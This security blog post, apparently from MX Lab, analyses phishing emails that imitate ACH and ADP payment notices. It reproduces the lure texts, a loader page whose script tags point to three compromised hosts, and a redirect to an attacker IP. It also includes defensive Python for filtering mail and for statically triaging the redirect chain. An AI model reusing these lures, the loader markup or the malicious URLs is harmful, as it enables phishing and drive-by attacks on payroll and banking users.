Email notifications with subjects like “ACH transfer suspended” or “ADP Generated Message – Debit Draft” are a potential security risk


MX Lab, http://www.mxlab.eu, is intercepting new campaigns that pose a potential security risk through JavaScript loaded from the linked web pages. We currently see two campaigns that use the same technique; only the content of the emails differs.

ACH related messages

Possible subjects:

ACH cancellation report
ACH payment report
ACH rejection notice
ACH transaction declined
ACH transaction suspended
ACH transfer rejected
ACH transfer not accepted
ACH transfer suspended
…..

The email is sent from “The Electronics Payment Association” (note the mangled name; the footer of the mail itself gives the correct “NACHA – The Electronic Payments Association”) with a spoofed email address of the form 52F54A1@domain.tld (the local part is a random string of uppercase letters and digits) and has the following body:

The ACH payment ID: #ACH672038492554US, that had been sent from your banking account recently, was suspended by the recipient.

ACH rejection notice
Transaction ID: #ACH672038492554US
Details: please refer to the report below for more information
Transaction Report report_#ACH672038492554US.doc (Microsoft Word Document)

13450 Sunrise Valley Drive, Suite 100
Herndon, VA 20171
2012 NACHA – The Electronic Payments Association

ADP related messages

Possible subjects:

ADP Generated Message – Debit Draft
ADP Funding Notification – Debit Draft
ADP Urgent Notification – Debit Draft
Message from ADP – Your bank account will be debited
Message from ADP – Your Transaction Report
…..

The email is sent from “ADPClientServices” with a spoofed email address of the form 9021ACB88@domain.tld (again a random uppercase alphanumeric local part) and has the following body:

Your Transaction Report(s) have been uploaded to the web site:

https://www.flexdirect.adp.com/client/login.aspx

Please note that your bank account will be debited within one banking business day for the amount(s) shown on the report(s).

Please do not respond or reply to this automated e-mail. If you have any questions or comments, please Contact your ADP Benefits Specialist.

Thank You,
ADP Benefit Services
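Both lures share indicators a mail filter can key on: the subject wording, a sender local part that is a short random uppercase alphanumeric string, a display name claiming NACHA or ADP while the sending domain belongs to neither, and (assuming the adp.com address in the ADP mail is anchor text laid over a different href) a link whose visible text names one host while its target is another. The following is an added example written for this post, not MX Lab's own filter; the sample messages, the placeholder domains and the one-point-per-indicator scoring are constructed.

```python
"""Header and body heuristics for the ACH/ADP lure described above, as a
triage rule over raw RFC 822 text. Regexes, thresholds and samples are
constructed for this example."""
import re
from email import message_from_string
from email.utils import parseaddr
from urllib.parse import urlparse

# Subject fragments seen across both campaigns.
SUBJECT_RE = re.compile(
    r"\b(?:ACH (?:transfer|transaction|payment|rejection|cancellation)"
    r"|Debit Draft|Message from ADP|Transaction Report)\b", re.I)
# Spoofed local parts like 52F54A1 or 9021ACB88: short, upper-case, hex-like.
RANDOM_LOCALPART_RE = re.compile(r"^[0-9A-F]{5,12}$")
# Brands the display names impersonate, and the domains that legitimately use them.
BRAND_RE = re.compile(r"NACHA|Electronics? Payments? Association|ADP", re.I)
BRAND_DOMAINS = ("nacha.org", "adp.com")
ANCHOR_RE = re.compile(r'<a\s[^>]*href\s*=\s*["\']([^"\']+)["\'][^>]*>(.*?)</a>',
                       re.I | re.S)
URL_RE = re.compile(r"https?://[^\s<\"']+", re.I)


def host_of(url):
    return urlparse(url).netloc.lower()


def domain_belongs_to(domain, brand_domains):
    domain = domain.lower()
    return any(domain == d or domain.endswith("." + d) for d in brand_domains)


def link_text_host_mismatch(html):
    """True if an anchor shows one URL as its text but points its href elsewhere."""
    for href, text in ANCHOR_RE.findall(html):
        shown = URL_RE.search(text)
        if shown and host_of(shown.group(0)) != host_of(href):
            return True
    return False


def score_message(raw):
    """Return (score, reasons); each independent indicator adds one point."""
    msg = message_from_string(raw)
    display_name, addr = parseaddr(msg.get("From", ""))
    local, _, domain = addr.partition("@")
    reasons = []
    if SUBJECT_RE.search(msg.get("Subject", "")):
        reasons.append("subject matches ACH/ADP lure wording")
    if RANDOM_LOCALPART_RE.match(local):
        reasons.append("sender local part is a random hex-like string")
    if BRAND_RE.search(display_name) and not domain_belongs_to(domain, BRAND_DOMAINS):
        reasons.append("display name claims a brand the sending domain does not belong to")
    body = msg.get_payload() if not msg.is_multipart() else ""
    if link_text_host_mismatch(body):
        reasons.append("link text shows a different host than its href")
    return len(reasons), reasons


# Constructed sample of the ADP variant: example.com and loader.invalid are
# placeholders; the visible link text is the address shown in the real mail.
ADP_LURE = """From: "ADPClientServices" <9021ACB88@example.com>
Subject: ADP Generated Message - Debit Draft
Content-Type: text/html

<p>Your Transaction Report(s) have been uploaded to the web site:</p>
<a href="http://loader.invalid/page.html">https://www.flexdirect.adp.com/client/login.aspx</a>
"""

# Constructed benign control message.
BENIGN = """From: "Payroll" <payroll@example.com>
Subject: Team lunch on Friday

See you there.
"""

if __name__ == "__main__":
    for sample in (ADP_LURE, BENIGN):
        score, reasons = score_message(sample)
        print(score, reasons)
```

The subject and brand lists are deliberately narrow to this campaign; in production the local-part test and the link-text mismatch are the durable indicators, since lure wording and display names change between waves.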

Further analysis:

In both campaigns, the embedded link (not necessarily the address displayed in the mail) leads to a web page that does nothing but load a JavaScript file from three hosts:

<html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script type="text/javascript" src="http://caregraphic.be/vezZnbka/js.js"></script>
<script type="text/javascript" src="http://skolari.webd.pl/L5nxVF3g/js.js"></script>
<script type="text/javascript" src="http://kingdomitservices.com/mn9Re7En/js.js"></script>
</html>

The three js.js files contain the same code; three copies on different hosts are included for redundancy, because in some cases one file or host has already been taken down and does not load. The file js.js contains nothing more than a redirect:

document.location='hxxp://69.194.192.203/links/deep_recover-result.php';

At this time the target page appears to be empty: our investigation with online HTML viewers and opening the web page directly shows no content. The technique, however, is the same as in the previous campaigns with messages from ADP, and it is possible that the URL will change or that the malicious code will be served at a later time.
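The loader page and the js.js redirect above can be triaged statically, without executing the script or visiting the final URL. The following is an added example, not MX Lab's tooling: it pulls the script sources out of the landing page, recovers the redirect target from each copy of js.js, and reports which copies were unreachable. The landing page is the one shown above; the three responses are constructed stand-ins for fetching the scripts (one host is assumed to be down), since the real hosts should not be contacted from an analyst's workstation.

```python
"""Static triage of a 'WAIT PLEASE / Loading...' loader page: list the external
scripts it pulls in and recover the redirect target from each js.js copy,
without ever executing the JavaScript or visiting the final URL."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptSrcParser(HTMLParser):
    """Collect the src attribute of every <script> tag on the landing page."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.srcs.append(value.strip())


def extract_script_srcs(html):
    parser = ScriptSrcParser()
    parser.feed(html)
    return parser.srcs


# Plain (unobfuscated) redirect idioms: location = '...', location.href = '...',
# location.replace('...') / location.assign('...'), each with an optional
# document./window./top./self. prefix.
_PREFIX = r"(?:(?:document|window|top|self)\s*\.\s*)?\blocation"
REDIRECT_RES = [
    re.compile(_PREFIX + r"(?:\s*\.\s*href)?\s*=(?!=)\s*(['\"])(.*?)\1", re.S),
    re.compile(_PREFIX + r"\s*\.\s*(?:replace|assign)\s*\(\s*(['\"])(.*?)\1", re.S),
]


def extract_redirects(js):
    """Return the redirect targets found in a script body, in order, deduplicated."""
    found = []
    for pattern in REDIRECT_RES:
        found.extend(m.group(2) for m in pattern.finditer(js))
    return list(dict.fromkeys(found))


def defang(url):
    """Render a URL so it cannot be clicked or auto-linked in a report."""
    p = urlparse(url)
    scheme = p.scheme.replace("http", "hxxp")
    host = p.netloc.replace(".", "[.]")
    query = f"?{p.query}" if p.query else ""
    return f"{scheme}://{host}{p.path}{query}"


def looks_like_redundant_loader(srcs):
    """The pattern in the post: the same filename served from several hosts."""
    hosts_by_name = {}
    for src in srcs:
        p = urlparse(src)
        filename = p.path.rsplit("/", 1)[-1]
        hosts_by_name.setdefault(filename, set()).add(p.netloc)
    return any(len(hosts) >= 2 for hosts in hosts_by_name.values())


def triage(landing_html, fetch):
    """fetch(url) returns the script body, or None if the host/file is down."""
    srcs = extract_script_srcs(landing_html)
    report = {"loaders": srcs, "unreachable": [], "destinations": []}
    for src in srcs:
        body = fetch(src)
        if body is None:
            report["unreachable"].append(src)
            continue
        report["destinations"].extend(extract_redirects(body))
    report["destinations"] = list(dict.fromkeys(report["destinations"]))
    return report


# The loader page as shown in the post.
LANDING_PAGE = """<html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script type="text/javascript" src="http://caregraphic.be/vezZnbka/js.js"></script>
<script type="text/javascript" src="http://skolari.webd.pl/L5nxVF3g/js.js"></script>
<script type="text/javascript" src="http://kingdomitservices.com/mn9Re7En/js.js"></script>
</html>"""

# Constructed offline stand-in for fetching the three copies: two serve the
# one-line redirect from the post, the second host is assumed to be down.
REDIRECT_JS = "document.location='http://69.194.192.203/links/deep_recover-result.php';"
CONSTRUCTED_RESPONSES = {
    "http://caregraphic.be/vezZnbka/js.js": REDIRECT_JS,
    "http://skolari.webd.pl/L5nxVF3g/js.js": None,
    "http://kingdomitservices.com/mn9Re7En/js.js": REDIRECT_JS,
}

if __name__ == "__main__":
    result = triage(LANDING_PAGE, CONSTRUCTED_RESPONSES.get)
    print("redundant loader:", looks_like_redundant_loader(result["loaders"]))
    for url in result["unreachable"]:
        print("unreachable:", defang(url))
    for url in result["destinations"]:
        print("redirects to:", defang(url))
```

To use it against a live sample, replace `CONSTRUCTED_RESPONSES.get` with a fetcher that runs from an isolated analysis host; the regexes only cover the plain redirect idioms, so a later wave that obfuscates js.js would need the script body deobfuscated first.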

MX Lab therefore recommends not clicking the embedded URLs in this type of message.

One comment on “Email notifications with subjects like “ACH transfer suspended” or “ADP Generated Message – Debit Draft” are a potential security risk”

  1. The email I got today showed the following:
    Valued client:

    Gavin recently declined Transaction at your account. Instance No. 135501442.
    Instance Topic: 54RQ
    Incident Occasion: Download

    We at ADP achieve to create a personalized and client focused experience with every client interaction.
    Please overview operation issued by
    visiting the link below.

    Click this link – ADP Major Accounts Operations described above
    Best Wishes,
    Gavin Peterson
    Vice President of Customer Care Department ADP
    ADP Major Accounts

    ***Reminder***
    Please remember to complete your Semi-Annual Service Quality Survey!
    Our Goal is to ensure you are VERY SATISFIED with each interaction you have with our Service Associates and we ask that you consider your overall experience in the 6 months preceding your receipt of the survey. We strive to provide WORLD CLASS SERVICE and determine our success by your satisfaction with ADP’s services.
    from email: ADP Operation Status
